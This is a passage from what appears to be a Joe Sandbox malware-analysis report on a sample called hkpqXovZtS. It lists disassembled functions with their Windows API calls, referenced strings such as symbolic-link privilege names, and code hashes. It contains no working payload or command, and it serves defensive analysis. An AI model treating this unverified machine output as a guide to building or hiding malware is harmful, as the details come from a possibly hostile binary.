Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3dba9e6331dd292a8beab9f750d4100d9d0c9abb848106ba39504629505c44
Instruction ID: 41b83b1e9a47c208fa8d4903caceee90eb1343d807d59eaccaa9955e4a94670e
Opcode Fuzzy Hash: fe3dba9e6331dd292a8beab9f750d4100d9d0c9abb848106ba39504629505c44
Instruction Fuzzy Hash: A0114C31909746AFCB06CF09C64054AF3F9FFD0B18F10C91EA18897214D370A915EA82

Function 00410B05 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
Instruction ID: 66fdee0eebfed7894a399b7546c00e67a4143da544f95ecc3f2bcd417279369f
Opcode Fuzzy Hash: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
Instruction Fuzzy Hash: 16F082B26047059AE7109E989846BEBB7E8EB0071CF20842FD5A6E6280C2F8F5C1CA45

Function 004DD291 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a81ed29a93e2219e4a15a1b0769aec605961e4f05589c75cbcd65c5f39a0c1f9
Instruction ID: 00afb1a014a7f3bdd77cfdff7546058b0acfa308d14db06f361988ebec7fecca
Opcode Fuzzy Hash: a81ed29a93e2219e4a15a1b0769aec605961e4f05589c75cbcd65c5f39a0c1f9
Instruction Fuzzy Hash: 2D112B7190D356EFCB09DF18D65055AB3E9FFD4B08F00C81EA18D87244DB70A916EB86

Function 022AAB51 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915c2c28c9ca2d91d48aa3ccc9e7ecb680446a30d8617f28b79ed40f57889cda
Instruction ID: 88903359933b28dc19845d656790c83632083a39c8a076c028cc30bc53f606e6
Opcode Fuzzy Hash: 915c2c28c9ca2d91d48aa3ccc9e7ecb680446a30d8617f28b79ed40f57889cda
Instruction Fuzzy Hash: D3F03931A21224EBCB26DACCD814B8973BDEB48B64F520496E441EB684CBB4DE40CBD1

Function 0044E465 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab17e480c7f28b9f3e277e22bc47b49dd693243f8fd2f3d03470623962dab936
Instruction ID: 80f76d182c1f2b13af6fea8deec4061f3e461568d5de02186e884fbca8bff432
Opcode Fuzzy Hash: ab17e480c7f28b9f3e277e22bc47b49dd693243f8fd2f3d03470623962dab936
Instruction Fuzzy Hash: 35F0F23150C305AFC742CF59C5408AAF3F8FFC4A14F10C92DA68887214E770A905CA82

Function 0045B9D5 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22237f8dff0c9612b12e3455ba6ce15eda12ca618ad17e5b0d4c78190e67bf88
Instruction ID: 56cfc0ad253e6bfe1a632af0ff045909337e18181820428e1049b9b9e3d5a7e1
Opcode Fuzzy Hash: 22237f8dff0c9612b12e3455ba6ce15eda12ca618ad17e5b0d4c78190e67bf88
Instruction Fuzzy Hash: E8F0ED7090D601DFDB05CF04D2814ABB7A0FBA2B08F108C5EE14743100F738A926CB8B

Function 022AAB95 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3ed18552373d85d4183fd86c6c01c8f371cd09a67b814452281b6f684ff16a
Instruction ID: 96312cee40564d205e0f2e366548806d230f4e8694c07150844d4c55aeb18110
Opcode Fuzzy Hash: 1c3ed18552373d85d4183fd86c6c01c8f371cd09a67b814452281b6f684ff16a
Instruction Fuzzy Hash: 99E04672922228EBCB14DFD88914D8AB3BDEB48B04B11049AA601E3520C270DE00CBD0

Function 00460651 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa4af83bf19185c09aa83c4ba1537d998611cee70fe7a2ffc76e3aa068c4d18
Instruction ID: e505f67d7fd0f35a12c6bc28c55b410344f6a285d8721398c04154fd9a17a4d6
Opcode Fuzzy Hash: ffa4af83bf19185c09aa83c4ba1537d998611cee70fe7a2ffc76e3aa068c4d18
Instruction Fuzzy Hash: 0FE0E23290E7C28FC7238B3885A0A46BFB0AF07244B4A08C7D080DF1A3C2146828CB12

Function 0044E492 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93844a3d800d03e5b004c27c050908e5db124e9fb62951dc559b850393626272
Instruction ID: 0b20bd12e1cbfbc00a4be732231be84ba8af739c5a65eea723f1744a4a256892
Opcode Fuzzy Hash: 93844a3d800d03e5b004c27c050908e5db124e9fb62951dc559b850393626272
Instruction Fuzzy Hash: 23C08C3200830CAF83022BA28882054B2F8EA90100F204038860242322E7B09618CA85

Function 004068C2 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 284fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004068C7
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 00406936
CloseHandle.KERNEL32(00000000), ref: 00406946
_wcslen.LIBCMT ref: 0040697E
CreateDirectoryW.KERNEL32(?,00000000), ref: 004069EA
_wcscpy.LIBCMT ref: 00406A04
_wcslen.LIBCMT ref: 00406A10
_wcscpy.LIBCMT ref: 00406A58

Part of subcall function 00406550: GetLastError.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000000,00000020,?), ref: 004065A5
Part of subcall function 00406550: CloseHandle.KERNEL32(?,00000000,?,?,00000000,00000020,?), ref: 004065B4

_wcscpy.LIBCMT ref: 00406A7C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406B26
CloseHandle.KERNEL32(00000000,00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00406B70
GetLastError.KERNEL32(?,?,?), ref: 00406B8E
DeleteFileW.KERNEL32(?), ref: 00406BD8

Part of subcall function 004197A3: ___sbh_find_block.LIBCMT ref: 004197CC
Part of subcall function 004197A3: ___sbh_free_block.LIBCMT ref: 004197DB
Part of subcall function 004197A3: GetLastError.KERNEL32(00000000,00000000,00429578,0000000C,0041E244,00000000,004298A0,0000000C,0041E27E,00000000,00419CF5,?,00423A76,00000004,00429A40,0000000C), ref: 0041981C

Strings

\??\, xrefs: 00406999
SeRestorePrivilege, xrefs: 004068DF
lB, xrefs: 00406BAF
UNC\, xrefs: 004069BB
SeCreateSymbolicLinkPrivilege, xrefs: 004068E9

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_wcscpy$_wcslen$DeleteDirectoryH_prolog___sbh_find_block___sbh_free_block
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\$lB
API String ID: 1519039449-3052919484
Opcode ID: d74cf4a6e6eaba5b538327a15ed480606066a8aec48130440f3a35a51a80831d
Instruction ID: 4bcf266bcd514663229e52bad585c9fa2ed6120b3b11112c6a55a11edf41b38e
Opcode Fuzzy Hash: d74cf4a6e6eaba5b538327a15ed480606066a8aec48130440f3a35a51a80831d
Instruction Fuzzy Hash: B7A1E3B1600254EEDB20EF64CC45BEA73B8AF04304F00456FF55AE7281DB79AA94CB68

Function 0040A5D3 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040A5ED
_wcsncpy.LIBCMT ref: 0040A624
_wcscpy.LIBCMT ref: 0040A62E
_wcsncpy.LIBCMT ref: 0040A66B
_wcscpy.LIBCMT ref: 0040A679
_wcscpy.LIBCMT ref: 0040A683
_wcsncpy.LIBCMT ref: 0040A6D4
_wcsncpy.LIBCMT ref: 0040A6E6
_wcscpy.LIBCMT ref: 0040A6F0
_wcslen.LIBCMT ref: 0040A715
_wcsncpy.LIBCMT ref: 0040A72F
_wcscpy.LIBCMT ref: 0040A73F

Strings

\\?\, xrefs: 0040A61E, 0040A665, 0040A6CE, 0040A729
UNC, xrefs: 0040A673

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy_wcsncpy$_wcslen
String ID: UNC$\\?\
API String ID: 2527645450-253988292
Opcode ID: 2c695419c2e62f5388721ef23b6ad1a10790c76ee85fbff0f03aa0e208c3e76d
Instruction ID: 447ae749f45e01d9c9a3efed3454102144e23ff83b1bbe9873edae9025d6cbe2
Opcode Fuzzy Hash: 2c695419c2e62f5388721ef23b6ad1a10790c76ee85fbff0f03aa0e208c3e76d
Instruction Fuzzy Hash: D231D472900304A6CB20BE618C42EEB336CAF45748F18842FF55477182EBBCD99586AE

Function 022A16E5 Relevance: 23.2, APIs: 2, Strings: 11, Instructions: 403COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,022B3318,?,?), ref: 022A178B
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,022B3318,?,?), ref: 022A17AF

Strings

Assertion failed!, xrefs: 022A1709
Expression: , xrefs: 022A1A45
..., xrefs: 022A180A, 022A1929, 022A197B, 022A1ABF, 022A1B42, 022A1B75
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 022A1AEE
Line: , xrefs: 022A19CB
Program: , xrefs: 022A174D
(Press Retry to debug the application - JIT must be enabled), xrefs: 022A1B18
\, xrefs: 022A18AC
kL, xrefs: 022A16F0
<program name unknown>, xrefs: 022A17B9
File: , xrefs: 022A1855

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\$kL
API String ID: 4146042529-2537061522
Opcode ID: 1a5f184b4efcdca7b6cf534568eaaf6223116b6539a005a4ddc2160bd2b71335
Instruction ID: a2a26bb69a3bbeade991b6a32985fe093a790bd85877b4b29ae87c625dcf8e31
Opcode Fuzzy Hash: 1a5f184b4efcdca7b6cf534568eaaf6223116b6539a005a4ddc2160bd2b71335
Instruction Fuzzy Hash: 22C129B5A202066BEB316EE48C59FFF736EDF45710F0405A8ED0D9194CF7309A66CAA4

Function 00418BC5 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00418BEB
_malloc.LIBCMT ref: 00418BF8

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

_wcscpy.LIBCMT ref: 00418C11
_wcscat.LIBCMT ref: 00418C1C
_wcscat.LIBCMT ref: 00418C27
_wcscat.LIBCMT ref: 00418C62
_wcscat.LIBCMT ref: 00418C73
_wcslen.LIBCMT ref: 00418C8C
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000,00000040,-00000009,?,<html>,00000006), ref: 00418CBE

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00418C16
utf-8"></head>, xrefs: 00418C21
</html>, xrefs: 00418C6D
<html>, xrefs: 00418C0A, 00418C0F, 00418C47

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscat$_wcslen$AllocateByteCharHeapMultiWide_malloc_wcscpy
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 532831754-4209811716
Opcode ID: ae29ef42d06069267daaa5c1e3adad9e8658f414fefcd541f1f2f83bdc308bb9
Instruction ID: eb02cb7d5e01995ca343aeefa9ef4e3976a0cdf504ece158080fbb147d33cfe2
Opcode Fuzzy Hash: ae29ef42d06069267daaa5c1e3adad9e8658f414fefcd541f1f2f83bdc308bb9
Instruction Fuzzy Hash: C9313832940244BACB20A7A19C82FEF77A89F52720F15415FF8146B2C2EF7C4D8183E9

Function 0040BBC4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040BC33
_strlen.LIBCMT ref: 0040BC64
_swprintf.LIBCMT ref: 0040BC86
_wcschr.LIBCMT ref: 0040BCA3
_wcsncpy.LIBCMT ref: 0040BCD7
_wcsrchr.LIBCMT ref: 0040BCE8
_wcscpy.LIBCMT ref: 0040BD06

Strings

@gB, xrefs: 0040BC00
%08x, xrefs: 0040BC7B
DgB, xrefs: 0040BBF9
HgB, xrefs: 0040BBF2
JgB, xrefs: 0040BBE5

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _strlen$_swprintf_wcschr_wcscpy_wcsncpy_wcsrchr
String ID: %08x$@gB$DgB$HgB$JgB
API String ID: 3224783807-3012681848
Opcode ID: 6e1d6a488b7c125c534b4a20ff991f733637cdb8b8d6a96d09dd2bb32fe32aeb
Instruction ID: ec7d254ae4d0367b488d4250043f0b82adcf22d54704baab9ccd03eed508303c
Opcode Fuzzy Hash: 6e1d6a488b7c125c534b4a20ff991f733637cdb8b8d6a96d09dd2bb32fe32aeb
Instruction Fuzzy Hash: A831B3326042196AEB24AA65EC85FEB62ACDB40354F50007FF905E62D1EF3CDD8096ED

Function 0041DDBA Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041DDEB
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041DDF8
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041DE05
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041DE12
TlsSetValue.KERNEL32(00000000), ref: 0041DE7D
__init_pointers.LIBCMT ref: 0041DE87
__mtterm.LIBCMT ref: 0041DF3D

Part of subcall function 0041DAD4: TlsFree.KERNEL32(00000016,0041DF42,KERNEL32.DLL), ref: 0041DAFF
Part of subcall function 0041DAD4: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0041E14F
Part of subcall function 0041DAD4: RtlDeleteCriticalSection.NTDLL(00000016), ref: 0041E179

Strings

KERNEL32.DLL, xrefs: 0041DDBE, 0041DDC3
FlsGetValue, xrefs: 0041DDED
FlsFree, xrefs: 0041DE07
FlsSetValue, xrefs: 0041DDFA
FlsAlloc, xrefs: 0041DDE5

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$FreeValue__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1151902095-3819984048
Opcode ID: 3ebff28e03d5beeb4e66c456e96221f4ce69474f75d430ea8086b39d1b20ebca
Instruction ID: 7b9ed8b20f57f21700ef2f037a4b37f55460a6d18105e71b1c33805bea37f77b
Opcode Fuzzy Hash: 3ebff28e03d5beeb4e66c456e96221f4ce69474f75d430ea8086b39d1b20ebca
Instruction Fuzzy Hash: 6231F8F5D4A7109AC720AB36AC05A963AA4FB46310F12493FF414932B1DB7C8495CB5E

Function 022AC1F2 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 022AC236

Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC52C
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC53E
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC550
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC562
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC574
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC586
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC598
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5AA
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5BC
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5CE
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5E0
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC5F2
Part of subcall function 022AC50F: _free.LIBCMT ref: 022AC604

_free.LIBCMT ref: 022AC22B

Part of subcall function 022A7A35: HeapFree.KERNEL32(00000000,00000000,?,022A6300), ref: 022A7A4B
Part of subcall function 022A7A35: GetLastError.KERNEL32(?,?,022A6300), ref: 022A7A5D

_free.LIBCMT ref: 022AC24D
_free.LIBCMT ref: 022AC262
_free.LIBCMT ref: 022AC26D
_free.LIBCMT ref: 022AC28F
_free.LIBCMT ref: 022AC2A2
_free.LIBCMT ref: 022AC2B0
_free.LIBCMT ref: 022AC2BB
_free.LIBCMT ref: 022AC2F3
_free.LIBCMT ref: 022AC2FA
_free.LIBCMT ref: 022AC317
_free.LIBCMT ref: 022AC32F

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 49b373e60b7e7bf46c99c86da23b671cdc6507f4d12e4af87cd5930afd35453e
Instruction ID: 79faa964318f19ffc261728ef28eae47bde59e2c93e55df6013a0a5a6bd6cd33
Opcode Fuzzy Hash: 49b373e60b7e7bf46c99c86da23b671cdc6507f4d12e4af87cd5930afd35453e
Instruction Fuzzy Hash: 2C319132620702AFDF21AEF8DC58B5AB3E5AF01750F10446AE056DB959DF74E940CF54

Function 00418920 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0041892B
_malloc.LIBCMT ref: 00418939

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
